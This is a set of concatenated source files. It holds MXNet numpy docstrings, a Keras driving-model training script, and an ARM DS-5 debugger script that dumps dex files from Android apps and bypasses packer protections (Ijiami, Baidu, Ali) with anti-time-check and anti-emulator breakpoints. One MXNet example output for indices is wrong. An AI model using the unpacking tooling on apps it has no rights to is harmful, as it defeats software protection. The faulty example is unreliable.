def var(a, axis=None, dtype=None, out=None, ddof=0, keepdims=False):
"""
Compute the variance along the specified axis.
Returns the variance of the array elements, a measure of the spread of a
distribution. The variance is computed for the flattened array by
default, otherwise over the specified axis.
Parameters
----------
a : array_like
Array containing numbers whose variance is desired. If `a` is not an
array, a conversion is attempted.
axis : None or int or tuple of ints, optional
Axis or axes along which the variance is computed. The default is to
compute the variance of the flattened array.
.. versionadded:: 1.7.0
If this is a tuple of ints, a variance is performed over multiple axes,
instead of a single axis or all the axes as before.
dtype : data-type, optional
Type to use in computing the variance. For arrays of integer type
the default is `float32`; for arrays of float types it is the same as
the array type.
out : ndarray, optional
Alternate output array in which to place the result. It must have
the same shape as the expected output, but the type is cast if
necessary.
ddof : int, optional
"Delta Degrees of Freedom": the divisor used in the calculation is
``N - ddof``, where ``N`` represents the number of elements. By
default `ddof` is zero.
keepdims : bool, optional
If this is set to True, the axes which are reduced are left
in the result as dimensions with size one. With this option,
the result will broadcast correctly against the input array.
If the default value is passed, then `keepdims` will not be
passed through to the `var` method of sub-classes of
`ndarray`, however any non-default value will be. If the
sub-class' method does not implement `keepdims` any
exceptions will be raised.
Returns
-------
variance : ndarray, see dtype parameter above
If ``out=None``, returns a new array containing the variance;
otherwise, a reference to the output array is returned.
Examples
--------
>>> a = np.array([[1, 2], [3, 4]])
>>> np.var(a)
array(1.25)
>>> np.var(a, axis=0)
array([1., 1.])
>>> np.var(a, axis=1)
array([0.25, 0.25])
>>> a = np.zeros((2, 512*512), dtype=np.float32)
>>> a[0, :] = 1.0
>>> a[1, :] = 0.1
>>> np.var(a)
array(0.2025)
>>> np.var(a, dtype=np.float64)
array(0.2025, dtype=float64)
>>> ((1-0.55)**2 + (0.1-0.55)**2)/2
0.2025
"""
return _npi.var(a, axis=axis, dtype=dtype, ddof=ddof, keepdims=keepdims, out=out)
# pylint: disable=redefined-outer-name
@set_module('mxnet.numpy')
def indices(dimensions, dtype=_np.int32, ctx=None):
"""Return an array representing the indices of a grid.
Compute an array where the subarrays contain index values 0,1,...
varying only along the corresponding axis.
Parameters
----------
dimensions : sequence of ints
The shape of the grid.
dtype : data-type, optional
        The desired data-type for the array. Default is `int32`.
ctx : device context, optional
Device context on which the memory is allocated. Default is
`mxnet.context.current_context()`.
Returns
-------
grid : ndarray
The array of grid indices,
``grid.shape = (len(dimensions),) + tuple(dimensions)``.
Notes
-----
The output shape is obtained by prepending the number of dimensions
in front of the tuple of dimensions, i.e. if `dimensions` is a tuple
``(r0, ..., rN-1)`` of length ``N``, the output shape is
``(N,r0,...,rN-1)``.
The subarrays ``grid[k]`` contains the N-D array of indices along the
``k-th`` axis. Explicitly::
grid[k,i0,i1,...,iN-1] = ik
Examples
--------
>>> grid = np.indices((2, 3))
>>> grid.shape
(2, 2, 3)
>>> grid[0] # row indices
array([[0, 0, 0],
[1, 1, 1]])
>>> grid[1] # column indices
array([[0, 0, 0],
[1, 1, 1]], dtype=int32)
The indices can be used as an index into an array.
>>> x = np.arange(20).reshape(5, 4)
>>> row, col = np.indices((2, 3))
>>> x[row, col]
array([[0., 1., 2.],
[4., 5., 6.]])
Note that it would be more straightforward in the above example to
extract the required elements directly with ``x[:2, :3]``.
"""
return _mx_nd_np.indices(dimensions=dimensions, dtype=dtype, ctx=ctx)
# pylint: enable=redefined-outer-name
@set_module('mxnet.numpy')
def copysign(x1, x2, out=None):
r"""copysign(x1, x2, out=None)
Change the sign of x1 to that of x2, element-wise.
If `x2` is a scalar, its sign will be copied to all elements of `x1`.
Parameters
----------
x1 : ndarray or scalar
Values to change the sign of.
x2 : ndarray or scalar
The sign of `x2` is copied to `x1`.
out : ndarray or None, optional
A location into which the result is stored. It must be of the
right shape and right type to hold the output. If not provided
        or `None`, a freshly-allocated array is returned.
Returns
-------
out : ndarray or scalar
The values of `x1` with the sign of `x2`.
This is a scalar if both `x1` and `x2` are scalars.
Notes
    -----
This function differs from the original `numpy.copysign
<https://docs.scipy.org/doc/numpy/reference/generated/numpy.copysign.html>`_ in
the following aspects:
- ``where`` param is not supported.
Examples
--------
>>> np.copysign(1.3, -1)
-1.3
>>> 1/np.copysign(0, 1)
inf
>>> 1/np.copysign(0, -1)
-inf
>>> a = np.array([-1, 0, 1])
>>> np.copysign(a, -1.1)
array([-1., -0., -1.])
>>> np.copysign(a, np.arange(3)-1)
array([-1., 0., 1.])
"""
return _mx_nd_np.copysign(x1, x2, out=out)
@set_module('mxnet.numpy')
def ravel(x, order='C'):
r"""
ravel(x)
Return a contiguous flattened array.
A 1-D array, containing the elements of the input, is returned. A copy is
made only if needed.
Parameters
----------
x : ndarray
Input array. The elements in `x` are read in row-major, C-style order and
packed as a 1-D array.
order : `C`, optional
        Only row-major, C-style order is supported.
Returns
-------
y : ndarray
y is an array of the same subtype as `x`, with shape ``(x.size,)``.
Note that matrices are special cased for backward compatibility, if `x`
is a matrix, then y is a 1-D ndarray.
Notes
-----
    This function differs from the original `numpy.ravel` in the following aspects:
    - Only row-major, C-style order is supported.
Examples
--------
It is equivalent to ``reshape(x, -1)``.
>>> x = np.array([[1, 2, 3], [4, 5, 6]])
>>> print(np.ravel(x))
[1. 2. 3. 4. 5. 6.]
>>> print(x.reshape(-1))
[1. 2. 3. 4. 5. 6.]
>>> print(np.ravel(x.T))
[1. 4. 2. 5. 3. 6.]
"""
return _mx_nd_np.ravel(x, order)
| 36.362259
| 132
| 0.609708
|
f922b090f347b7a400c781761032812282aaa2c4
| 4,433
|
py
|
Python
|
model.py
|
hirovi/Behaviour_Cloning
|
e602bf665bcd09dbf2e581471b0f7ccbba61a2e5
|
[
"MIT"
] | 1
|
2018-01-07T22:43:47.000Z
|
2018-01-07T22:43:47.000Z
|
model.py
|
hirovi/Behaviour_Cloning
|
e602bf665bcd09dbf2e581471b0f7ccbba61a2e5
|
[
"MIT"
] | null | null | null |
model.py
|
hirovi/Behaviour_Cloning
|
e602bf665bcd09dbf2e581471b0f7ccbba61a2e5
|
[
"MIT"
] | null | null | null |
import csv
import os
import cv2
import sklearn
import numpy as np
from sklearn.utils import shuffle
#Read the data file and append each row
lines = []
with open('data/driving_log.csv', 'r') as csvfile:
reader = csv.reader(csvfile)
for line in reader:
lines.append(line)
#Split data into training and validation
from sklearn.model_selection import train_test_split
train_samples, validation_samples = train_test_split(lines, test_size=0.2)
batch_size = 32
#Define a Python generator that reduces how much data must be held in memory while feeding the model
def generator(samples, batch_size):
num_samples = len(samples)
while True:
shuffle(samples)
for offset in range(0, num_samples, batch_size):
batch_samples = samples[offset:offset+batch_size]
images, augmented_images, measurements, augmented_measurements = [], [], [], []
for batch_sample in batch_samples:
                steering_center = float(batch_sample[3]) #The CSV stores the steering angle as a string, so cast it to a float
correction = 0.2 # Correction parameter added to the steering value of the side images from the car
steering_left = steering_center + correction
steering_right = steering_center - correction
#Generalize data reading from Linux or Windows
for i in range(3):
source_path = batch_sample[i]
if '\\' in source_path:
filename = source_path.split('\\')[-1]
else:
filename = source_path.split('/')[-1]
#Save, read and store the image
current_path = 'data/IMG/' + filename
image = cv2.imread(current_path)
images.append(image)
if i == 1:
measurements.append(steering_left)
elif i == 2:
measurements.append(steering_right)
else:
measurements.append(steering_center)
#Go through every image and steering angle and add the flipped image (negative steering)
for image, measurement in zip(images, measurements):
augmented_images.append(image)
augmented_measurements.append(measurement)
augmented_images.append(cv2.flip(image, 1))
augmented_measurements.append(measurement*-1.0)
#Convert the images and measurements into numpy arrays (Keras needs it)
X_train = np.array(augmented_images)
y_train = np.array(augmented_measurements)
yield sklearn.utils.shuffle(X_train, y_train)
#Read next val of the generator
train_generator = generator(train_samples, batch_size)
validation_generator = generator(validation_samples, batch_size)
##Architecture##
#Based on the NVIDIA End to End Learning Paper for Self Driving Cars
from keras.models import Sequential
from keras.layers import Flatten, Dense, Lambda, Activation
from keras.layers.convolutional import Convolution2D, Cropping2D
from keras.layers.pooling import MaxPooling2D
model = Sequential()
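# Normalize pixel values from [0, 255] to [-0.5, 0.5] inside the model so the same
# preprocessing is applied automatically at inference time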
model.add(Lambda(lambda x: x/255.0 - 0.5, input_shape=(160, 320, 3)))
model.add(Cropping2D(cropping=((70,25),(0,0)))) # crop 70 pixels from the top and 25 from the bottom; keep the full image width
model.add(Convolution2D(24,5,5, subsample=(2,2), activation='relu')) #24 filters, 5x5 each filter; subsample is the same as strides in keras
model.add(Convolution2D(36,5,5, subsample=(2,2), activation='relu')) #36 filters, 5x5 each filter
model.add(Convolution2D(48,5,5, subsample=(2,2), activation='relu')) #48 filters, 5x5 each filter
model.add(Convolution2D(64,3,3, activation='relu')) #64 filters, 3x3 each filter
model.add(Convolution2D(64,3,3, activation='relu')) #64 filters, 3x3 each filter
model.add(Flatten())
model.add(Dense(100))
model.add(Dense(50))
model.add(Dense(10))
model.add(Dense(1))
#Use the Adam Optimizer to minimize cost function
model.compile(loss='mse', optimizer='adam')
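#Each CSV line yields six training images per epoch: centre, left and right camera
#frames plus a horizontally flipped copy of each, hence samples_per_epoch = len(train_samples)*6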
model.fit_generator(train_generator, samples_per_epoch=len(train_samples)*6, validation_data=validation_generator, nb_val_samples=len(validation_samples), nb_epoch=3)
model.save('model.h5')
exit()
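# A minimal inference sketch (not part of the original training script; the input
# image is assumed to be a single 160x320x3 frame matching the training data):
#
#   from keras.models import load_model
#   model = load_model('model.h5')
#   steering_angle = float(model.predict(image[None, :, :, :], batch_size=1))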
| 43.891089
| 167
| 0.653282
|
65b43d15098e06b351483f957d9ece9b332a3061
| 25,367
|
py
|
Python
|
ds5-scripts/aosp_6_0/arm/DexFile.py
|
rewhy/happer
|
3b48894e2d91f150f1aee0ce75291b9ca2a29bbe
|
[
"Apache-2.0"
] | 32
|
2021-04-08T05:39:51.000Z
|
2022-03-31T03:49:35.000Z
|
ds5-scripts/aosp_6_0/arm/DexFile.py
|
rewhy/happer
|
3b48894e2d91f150f1aee0ce75291b9ca2a29bbe
|
[
"Apache-2.0"
] | 2
|
2021-04-14T08:31:30.000Z
|
2021-08-29T19:12:09.000Z
|
ds5-scripts/aosp_6_0/arm/DexFile.py
|
rewhy/happer
|
3b48894e2d91f150f1aee0ce75291b9ca2a29bbe
|
[
"Apache-2.0"
] | 3
|
2021-06-08T08:52:56.000Z
|
2021-06-23T17:28:51.000Z
|
# DexFile.py is used to dump the dex file when the "DexFile::<init>" method is invoked in 32-bit mode.
import gc
import os
import sys
from arm_ds.debugger_v1 import Debugger
from arm_ds.debugger_v1 import DebugException
import config
import memory
import mmu
from DexParser import header_item, class_data_item
from OfflineDexParser import Dex
# obtain current execution state
debugger = Debugger()
execution_state = debugger.getCurrentExecutionContext()
# define the analyzing configuration related to the DexFile loading
def dex_setup(pid):
# define the breakpoints
# DexFile related
brk_DexFile_cmd = "hbreak" + " " + str(hex(config.brk_DexFile)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
# brk_DexFile_cmd = "hbreak" + " " + str(hex(config.brk_DexFile)).replace('L', '')
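    # The assembled string is a DS-5 command of the form
    # "hbreak 0x<address> context 0x<pid>" (values illustrative): a hardware
    # breakpoint that only triggers within the target process context.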
execution_state.executeDSCommand(brk_DexFile_cmd)
# define the breakpoint scripts
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
# DexFile related
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_DexFile:
bs_DexFile_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.DexFile_script)
execution_state.executeDSCommand(bs_DexFile_cmd)
brk_object.enable()
# define the analyzing configuration related to the Java execution flow
def je_setup(pid):
# define the breakpoints
# execution flow related
brk_ArtQuickToInterpreterBridge_cmd = "hbreak" + " " + str(hex(config.brk_ArtQuickToInterpreterBridge)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_ArtQuickToInterpreterBridge_cmd)
# brk_ArtInterpreterToInterpreterBridge_cmd = "hbreak" + " " + str(hex(config.brk_ArtInterpreterToInterpreterBridge)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
# execution_state.executeDSCommand(brk_ArtInterpreterToInterpreterBridge_cmd)
# brk_ArtInterpreterToCompiledCodeBridge_cmd = "hbreak" + " " + str(hex(config.brk_ArtInterpreterToCompiledCodeBridge)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
# execution_state.executeDSCommand(brk_ArtInterpreterToCompiledCodeBridge_cmd)
brk_DoCall_cmd = "hbreak" + " " + str(hex(config.brk_DoCall)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_DoCall_cmd)
brk_ArtQuickGenericJniTrampoline_cmd = "hbreak" + " " + str(hex(config.brk_ArtQuickGenericJniTrampoline)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_ArtQuickGenericJniTrampoline_cmd)
brk_Invoke_cmd = "hbreak" + " " + str(hex(config.brk_Invoke)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_Invoke_cmd)
# define the breakpoint scripts
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
# execution flow related
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_ArtQuickToInterpreterBridge:
bs_ArtQuickToInterpreterBridge_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.ArtQuickToInterpreterBridge_script)
execution_state.executeDSCommand(bs_ArtQuickToInterpreterBridge_cmd)
brk_object.enable()
# if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_ArtInterpreterToInterpreterBridge:
# bs_ArtInterpreterToInterpreterBridge_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.ArtInterpreterToInterpreterBridge_script)
# execution_state.executeDSCommand(bs_ArtInterpreterToInterpreterBridge_cmd)
# brk_object.enable()
# if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_ArtInterpreterToCompiledCodeBridge:
# bs_ArtInterpreterToCompiledCodeBridge_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.ArtInterpreterToCompiledCodeBridge_script)
# execution_state.executeDSCommand(bs_ArtInterpreterToCompiledCodeBridge_cmd)
# brk_object.enable()
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_DoCall:
bs_DoCall_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.DoCall_script)
execution_state.executeDSCommand(bs_DoCall_cmd)
brk_object.enable()
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_ArtQuickGenericJniTrampoline:
bs_ArtQuickGenericJniTrampoline_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.ArtQuickGenericJniTrampoline_script)
execution_state.executeDSCommand(bs_ArtQuickGenericJniTrampoline_cmd)
brk_object.enable()
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_Invoke:
bs_Invoke_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.Invoke_script)
execution_state.executeDSCommand(bs_Invoke_cmd)
brk_object.enable()
brk_object.ignore(0)
# define the analyzing configuration related to the Native execution flow
def ne_setup(pid):
# define the breakpoints
# JNI_onLoad related
brk_LoadNativeLibrary_cmd = "hbreak" + " " + str(hex(config.brk_LoadNativeLibrary)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_LoadNativeLibrary_cmd)
brk_JNI_onLoad_cmd = "hbreak" + " " + str(hex(config.brk_JNI_onLoad)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_JNI_onLoad_cmd)
# execution flow related
brk_ArtQuickGenericJniTrampoline_cmd = "hbreak" + " " + str(hex(config.brk_ArtQuickGenericJniTrampoline)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_ArtQuickGenericJniTrampoline_cmd)
brk_ArtQuickGenericJniEndTrampoline_cmd = "hbreak" + " " + str(hex(config.brk_ArtQuickGenericJniEndTrampoline)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_ArtQuickGenericJniEndTrampoline_cmd)
# define the breakpoint scripts
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
# JNI_onLoad related
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_LoadNativeLibrary:
bs_LoadNativeLibrary_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.LoadNativeLibrary_script)
execution_state.executeDSCommand(bs_LoadNativeLibrary_cmd)
brk_object.enable()
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_JNI_onLoad:
bs_JNI_onLoad_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.JNI_onLoad_script)
execution_state.executeDSCommand(bs_JNI_onLoad_cmd)
brk_object.enable()
# execution flow related
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_ArtQuickGenericJniTrampoline:
bs_ArtQuickGenericJniTrampoline_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.ArtQuickGenericJniTrampoline_script)
execution_state.executeDSCommand(bs_ArtQuickGenericJniTrampoline_cmd)
brk_object.enable()
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_ArtQuickGenericJniEndTrampoline:
bs_ArtQuickGenericJniEndTrampoline_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.ArtQuickGenericJniEndTrampoline_script)
execution_state.executeDSCommand(bs_ArtQuickGenericJniEndTrampoline_cmd)
brk_object.enable()
# define the analyzing configuration related to the Art-Runtime execution flow
def art_setup(pid):
# define the breakpoints
# execution flow related
brk_LoadClassMembers_cmd = "hbreak" + " " + str(hex(config.brk_LoadClassMembers)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_LoadClassMembers_cmd)
brk_LoadMethod_cmd = "hbreak" + " " + str(hex(config.brk_LoadMethod)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_LoadMethod_cmd)
# define the breakpoint scripts
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
# execution flow related
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_LoadClassMembers:
bs_LoadClassMembers_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.LoadClassMembers_script)
execution_state.executeDSCommand(bs_LoadClassMembers_cmd)
brk_object.enable()
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_LoadMethod:
bs_LoadMethod_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.LoadMethod_script)
execution_state.executeDSCommand(bs_LoadMethod_cmd)
brk_object.enable()
# brk_object.ignore(13)
# define the analyzing configuration related to the in-memory dex file modification
def dex_modification_setup(pid):
# define the breakpoints
# brk_DexModification_cmd = "hbreak" + " " + str(hex(config.brk_JNI_onLoad)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
brk_DexModification_cmd = "hbreak" + " " + str(hex(config.brk_ArtQuickGenericJniEndTrampoline)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_DexModification_cmd)
# define the breakpoint scripts
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
# if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_JNI_onLoad:
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_ArtQuickGenericJniEndTrampoline:
bs_DexModification_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.DexModification_script)
execution_state.executeDSCommand(bs_DexModification_cmd)
brk_object.enable()
# define the analyzing configuration related to the Class-object modification
def class_modification_setup(pid):
# define the breakpoints
brk_ClassModification_cmd = "hbreak" + " " + str(hex(config.brk_DoCall)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_ClassModification_cmd)
# define the breakpoint scripts
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_DoCall:
bs_ClassModification_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.ClassModification_script)
execution_state.executeDSCommand(bs_ClassModification_cmd)
brk_object.enable()
# define the analyzing configuration related to the anti-time-checking
def anti_time_checking_setup(pid):
# define the breakpoints
# brk_clock_gettime_cmd = "hbreak" + " " + str(hex(config.brk_clock_gettime)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
# execution_state.executeDSCommand(brk_clock_gettime_cmd)
brk_gettimeofday_cmd = "hbreak" + " " + str(hex(config.brk_gettimeofday)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_gettimeofday_cmd)
# define the breakpoint scripts
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
# if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_clock_gettime:
# bs_clock_gettime_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.clock_gettime_script)
# execution_state.executeDSCommand(bs_clock_gettime_cmd)
# brk_object.enable()
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_gettimeofday:
bs_gettimeofday_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.gettimeofday_script)
execution_state.executeDSCommand(bs_gettimeofday_cmd)
brk_object.enable()
def anti_emulator(pid):
# define the breakpoints
brk_Invoke_cmd = "hbreak" + " " + str(hex(config.brk_Invoke)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_Invoke_cmd)
brk_strcmp_cmd = "hbreak" + " " + str(hex(config.brk_strcmp)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_strcmp_cmd)
brk_strncmp_cmd = "hbreak" + " " + str(hex(config.brk_strncmp)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_strncmp_cmd)
# define the breakpoint scripts
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_Invoke:
bs_Invoke_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.Invoke_script)
execution_state.executeDSCommand(bs_Invoke_cmd)
brk_object.enable()
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_strcmp:
bs_strcmp_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.strcmp_script)
execution_state.executeDSCommand(bs_strcmp_cmd)
brk_object.enable()
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_strncmp:
bs_strncmp_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.strncmp_script)
execution_state.executeDSCommand(bs_strncmp_cmd)
brk_object.enable()
def unpack_ali_2016(pid):
dex_modification_setup(pid)
def unpack_baidu_2016(file_path, dex_file_base, dex_file_size):
dex = Dex.Dex(file_path)
for class_def_item in dex.class_defs.class_def_items:
class_data_off = class_def_item.class_data_off
if (class_data_off > dex_file_size) or (class_data_off < 0):
# parse class_data_item
static_fields_size_off = 0x0
static_fields_size, length_static_fields_size = class_data_item.get_static_fields_size(dex_file_base, class_data_off, static_fields_size_off)
config.log_print("[DexFile] [class_data_item] static_fields_size = %#x" % static_fields_size)
instance_fields_size_off = static_fields_size_off + length_static_fields_size
instance_fields_size, length_instance_fields_size = class_data_item.get_instance_fields_size(dex_file_base, class_data_off, instance_fields_size_off)
config.log_print("[DexFile] [class_data_item] instance_fields_size = %#x" % instance_fields_size)
direct_methods_size_off = instance_fields_size_off + length_instance_fields_size
direct_methods_size, length_direct_methods_size = class_data_item.get_direct_methods_size(dex_file_base, class_data_off, direct_methods_size_off)
config.log_print("[DexFile] [class_data_item] direct_methods_size = %#x" % direct_methods_size)
virtual_methods_size_off = direct_methods_size_off + length_direct_methods_size
virtual_methods_size, length_virtual_methods_size = class_data_item.get_virtual_methods_size(dex_file_base, class_data_off, virtual_methods_size_off)
config.log_print("[DexFile] [class_data_item] virtual_methods_size = %#x" % virtual_methods_size)
static_fields_off = virtual_methods_size_off + length_virtual_methods_size
static_fields, length_static_fields = class_data_item.get_static_fields(dex_file_base, class_data_off, static_fields_off, static_fields_size)
for idx in range(static_fields_size):
config.log_print("[DexFile] [class_data_item] static_fields[%d].field_idx_diff = %#x" % (idx, static_fields[idx][0]))
config.log_print("[DexFile] [class_data_item] static_fields[%d].access_flags = %0#10x" % (idx, static_fields[idx][1]))
instance_fields_off = static_fields_off + length_static_fields
instance_fields, length_instance_fields = class_data_item.get_instance_fields(dex_file_base, class_data_off, instance_fields_off, instance_fields_size)
for idx in range(instance_fields_size):
config.log_print("[DexFile] [class_data_item] instance_fields[%d].field_idx_diff = %#x" % (idx, instance_fields[idx][0]))
config.log_print("[DexFile] [class_data_item] instance_fields[%d].access_flags = %0#10x" % (idx, instance_fields[idx][1]))
direct_methods_off = instance_fields_off + length_instance_fields
direct_methods, length_direct_methods = class_data_item.get_direct_methods(dex_file_base, class_data_off, direct_methods_off, direct_methods_size)
for idx in range(direct_methods_size):
config.log_print("[DexFile] [class_data_item] direct_methods[%d].method_idx_diff = %#x" % (idx, direct_methods[idx][0]))
config.log_print("[DexFile] [class_data_item] direct_methods[%d].access_flags = %0#10x" % (idx, direct_methods[idx][1]))
config.log_print("[DexFile] [class_data_item] direct_methods[%d].code_off = %0#10x" % (idx, direct_methods[idx][2]))
virtual_methods_off = direct_methods_off + length_direct_methods
virtual_methods, length_virtual_methods = class_data_item.get_virtual_methods(dex_file_base, class_data_off, virtual_methods_off, virtual_methods_size)
for idx in range(virtual_methods_size):
config.log_print("[DexFile] [class_data_item] virtual_methods[%d].method_idx_diff = %#x" % (idx, virtual_methods[idx][0]))
config.log_print("[DexFile] [class_data_item] virtual_methods[%d].access_flags = %0#10x" % (idx, virtual_methods[idx][1]))
config.log_print("[DexFile] [class_data_item] virtual_methods[%d].code_off = %0#10x" % (idx, virtual_methods[idx][2]))
class_data_size = virtual_methods_off + length_virtual_methods
file_path = os.path.join(config.workspace, config.dex_directory, "class_data_item_%0#10x.bin" % (class_data_off if class_data_off > 0 else (0xffffffff + class_data_off)))
if not os.path.exists(file_path):
file_format = "binary"
file_vtl_start_address = (dex_file_base + class_data_off) & 0xffffffff
file_vtl_end_address = ((dex_file_base + class_data_off) & 0xffffffff) + class_data_size - 0x1
memory.dump(file_path, file_format, file_vtl_start_address, file_vtl_end_address)
def unpack_bangcle_2016(pid):
pass
def unpack_ijiami_2016(pid):
art_setup(pid)
anti_time_checking_setup(pid)
def unpack_qihoo_2016(pid):
pass
# set the analyzing environment
def setup(pid):
# if we re-enter the configuration process, we will perform some verifications
if execution_state.getBreakpointService().getBreakpointCount() > 1:
        # we can infer that the base dex file has been loaded more than once;
        # furthermore, in normal cases, the pid for the DexFile breakpoint should remain the same
info_breakpoint_cmd = "info breakpoints"
breakpoint_info_list = execution_state.executeDSCommand(info_breakpoint_cmd).split('\n')
for idx in range(len(breakpoint_info_list)):
current_info = breakpoint_info_list[idx]
if ("%0#10x" % config.brk_DexFile) in current_info:
current_pid_info = breakpoint_info_list[idx + 2]
if current_pid_info.strip().startswith("Only for Context ID "):
previous_pid_string = current_pid_info.strip().replace("Only for Context ID ", "").replace(",", "")
previous_pid = int(previous_pid_string)
# in normal cases, we do nothing
if previous_pid == pid:
return
break
# remove all current breakpoints
try:
debugger.removeAllBreakpoints()
except DebugException:
rm_brks = []
for breakpoint_index in range(0, execution_state.getBreakpointService().getBreakpointCount()):
breakpoint_object = execution_state.getBreakpointService().getBreakpoint(breakpoint_index)
if breakpoint_object.isHardware() or ((int(breakpoint_object.getAddresses()[0]) & 0xffffffff) == config.brk_DexFile):
rm_brks.append(breakpoint_object)
for brk_obj in rm_brks:
brk_obj.remove()
# combination of different analyzing configurations
dex_setup(pid)
# je_setup(pid)
# ne_setup(pid)
# art_setup(pid)
# class_modification_setup(pid)
# anti_time_checking_setup(pid)
# anti_emulator(pid)
# unpack_ali_2016(pid)
# unpack_bangcle_2016(pid)
unpack_ijiami_2016(pid)
# unpack_qihoo_2016(pid)
def retrieve_string_value(string_ptr):
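    # Layout used by this helper: the std::string object stores a length field
    # and a pointer to its character data at the offsets recorded in config
    # (offset_string_length / offset_string_reference).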
length_val = memory.readMemory32(string_ptr + config.offset_string_length)
reference_ptr = memory.readMemory32(string_ptr + config.offset_string_reference)
char_array = memory.retrieve_char_array(reference_ptr)
return char_array
def cleanup():
if mmu.page_table is not None:
